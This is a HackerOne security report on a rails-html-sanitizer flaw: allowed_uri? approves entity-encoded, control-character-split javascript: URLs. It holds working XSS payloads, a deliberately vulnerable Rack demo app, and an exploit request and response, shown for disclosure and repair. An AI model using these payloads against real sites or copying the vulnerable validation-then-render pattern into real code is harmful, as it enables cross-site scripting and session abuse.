Rails::HTML::Sanitizer.allowed_uri? returns true for entity-encoded control-character-split javascript: URLs
Low
Vulnerability Details
# Summary
`Rails::HTML::Sanitizer.allowed_uri?` returns `true` for entity-encoded control-character-split `javascript:` URLs such as:
- `java script:alert(1)`
- `java script:alert(1)`
- `jav	ascript:alert(1)`
When these values are rendered into `href` attributes, browsers normalize them to `javascript:` URLs and execute them on click.
This is not a bypass of the default `sanitize(...)` DOM-scrubbing path. The issue is specifically in the public URI-validation helper exposed by `rails-html-sanitizer`.
# Affected Component
- `rails-html-sanitizer`
- `lib/rails/html/sanitizer.rb`
- `Rails::HTML::Sanitizer.allowed_uri?`
Observed on:
- `rails-html-sanitizer 1.7.0`
Relevant code:
```ruby
# lib/rails/html/sanitizer.rb
def allowed_uri?(uri_string)
Loofah::HTML5::Scrub.allowed_uri?(uri_string)
end
```
The delegated implementation is in Loofah:
```ruby
# loofah/lib/loofah/html5/scrub.rb
def allowed_uri?(uri_string)
val_unescaped = CGI.unescapeHTML(uri_string.gsub(CONTROL_CHARACTERS, "")).gsub(":", ":").downcase
if URI_PROTOCOL_REGEX.match?(val_unescaped)
protocol = val_unescaped.split(SafeList::PROTOCOL_SEPARATOR)[0]
return false unless SafeList::ALLOWED_PROTOCOLS.include?(protocol)
end
true
end
```
# Root Cause
The helper removes literal control characters before HTML entity decoding, but it does not remove control characters that appear only after decoding entities.
As a result:
1. `java script:...` is decoded to `java\rscript:...`
2. the helper still returns `true`
3. browsers normalize the value to `javascript:...`
This breaks the security expectation of a helper whose stated purpose is to validate URI attribute values before rendering.
# Why This Matters
The helper is documented in code as a string-level URI safety check:
```ruby
# loofah/lib/loofah/html5/scrub.rb
# Returns true if the given URI string is safe, false otherwise.
# This method can be used to validate URI attribute values without
# requiring a Nokogiri DOM node.
```
In other words, this helper is meant to answer the security question:
- “Can this string safely be used as a URI attribute value?”
For the payloads above, the current answer is `true`, but browsers treat the result as executable `javascript:`.
# Important Scope Note
The default sanitization path is not being claimed as broken here.
The following still behaves safely:
```ruby
Rails::HTML5::SafeListSanitizer.new.sanitize('<a href="java script:alert(1)">x</a>')
# => "<a>x</a>"
```
So the issue is specifically:
- `allowed_uri?` validation bypass
- not a full `sanitize(...)` bypass
# Preconditions / Threat Model
Exploitability requires:
1. application code uses `Rails::HTML::Sanitizer.allowed_uri?` to validate a user-controlled URL
2. if validation succeeds, the application renders that URL into an `href` or similar browser-interpreted URI attribute
3. a user clicks the rendered link
This is therefore a framework-level validation bug with an application-dependent XSS path.
# Runtime Reproduction
Minimal helper probe:
```ruby
require "rails-html-sanitizer"
puts Rails::HTML::Sanitizer.allowed_uri?("java script:alert(1)")
puts Rails::HTML::Sanitizer.allowed_uri?("java script:alert(1)")
puts Rails::HTML::Sanitizer.allowed_uri?("jav	ascript:alert(1)")
```
Observed output:
```text
true
true
true
```
Additional sanity check:
```ruby
require "rails-html-sanitizer"
san = Rails::HTML5::SafeListSanitizer.new
puts san.sanitize('<a href="java script:alert(1)">x</a>')
```
Observed output:
```text
<a>x</a>
```
This confirms the issue is in the helper, not the default DOM scrubber.
# E2E Reproduction
The following minimal Rack app reproduces a realistic application pattern:
- it accepts a user-controlled `next` URL
- it validates that URL with `Rails::HTML::Sanitizer.allowed_uri?`
- if validation succeeds, it renders a continuation link
Server used:
```ruby
require "rack"
require "rails-html-sanitizer"
app = lambda do |env|
req = Rack::Request.new(env)
case [req.request_method, req.path_info]
when ["GET", "/"]
next_url = req.params["next"].to_s
next_url = "java script:document.title='owned';document.body.innerText='EXECUTED';void(0)" if next_url.empty?
allowed = Rails::HTML::Sanitizer.allowed_uri?(next_url)
body = <<~HTML
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>allowed-uri-e2e</title>
</head>
<body>
<h1>Continue</h1>
<pre id="meta">allowed=#{allowed.inspect}\nnext=#{next_url.inspect}</pre>
#{allowed ? %(<a id="continue" href="#{next_url}">Continue</a>) : %(<p id="blocked">Blocked</p>)}
</body>
</html>
HTML
[200, { "content-type" => "text/html; charset=utf-8" }, [body]]
else
[404, { "content-type" => "text/plain; charset=utf-8" }, ["not found"]]
end
end
run app
```
Example raw request:
```http
GET /?next=java%26%2313%3Bscript%3Adocument.title%3D%27owned%27%3Bdocument.body.innerText%3D%27EXECUTED%27%3Bvoid(0) HTTP/1.1
Host: 127.0.0.1:9442
User-Agent: curl/8.7.1
Accept: */*
```
Observed raw response:
```http
HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 520
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>allowed-uri-e2e</title>
</head>
<body>
<h1>Continue</h1>
<pre id="meta">allowed=true
next="java script:document.title='owned';document.body.innerText='EXECUTED';void(0)"</pre>
<a id="continue" href="java script:document.title='owned';document.body.innerText='EXECUTED';void(0)">Continue</a>
</body>
</html>
```
The important point is:
- the helper returns `allowed=true`
- the unsafe link is rendered
# Browser Confirmation
When the above page is opened in Chrome, the DOM normalizes the rendered link as follows:
```text
attr = "java\\rscript:document.title='owned';document.body.innerText='EXECUTED';void(0)"
href = "javascript:document.title='owned';document.body.innerText='EXECUTED';void(0)"
protocol = "javascript:"
```
After clicking the rendered link:
```text
document.title = "owned"
document.body.innerText = "EXECUTED"
```
alert('test') case capture:
{F5522246}
This confirms that the helper-approved value becomes an executable `javascript:` URL in the browser.
# Suggested Fix
`allowed_uri?` should reject entity-encoded control-character-split schemes that browsers normalize into executable protocols.
At minimum:
- decode HTML entities before the final control-character normalization step, or
- strip control characters again after entity decoding, before protocol validation
Regression tests should explicitly cover:
- `java script:...`
- `java script:...`
- `jav	ascript:...`
# Notes
- Root cause appears to be in the delegated Loofah helper implementation.
- This report is scoped to the public Rails-exposed API `Rails::HTML::Sanitizer.allowed_uri?`.
- This report does not claim that the default `sanitize(...)` path is bypassed.
## Impact
This is a conditional XSS primitive through a public URI-validation helper.
If an application:
1. validates user-controlled URLs with `Rails::HTML::Sanitizer.allowed_uri?`
2. renders approved URLs into link targets or other browser-interpreted URI attributes
3. relies on the helper’s boolean result as a security decision
then an attacker can supply values that the helper marks as allowed but that browsers execute as `javascript:`.
Potential impact includes:
- client-side code execution on click
- token or sensitive-page data theft in affected flows
- arbitrary actions in the user’s session
- phishing / malicious continuation-link abuse
Actions
View on HackerOneReport Stats
- Report ID: 3601655
- State: Closed
- Substate: resolved
- Upvotes: 1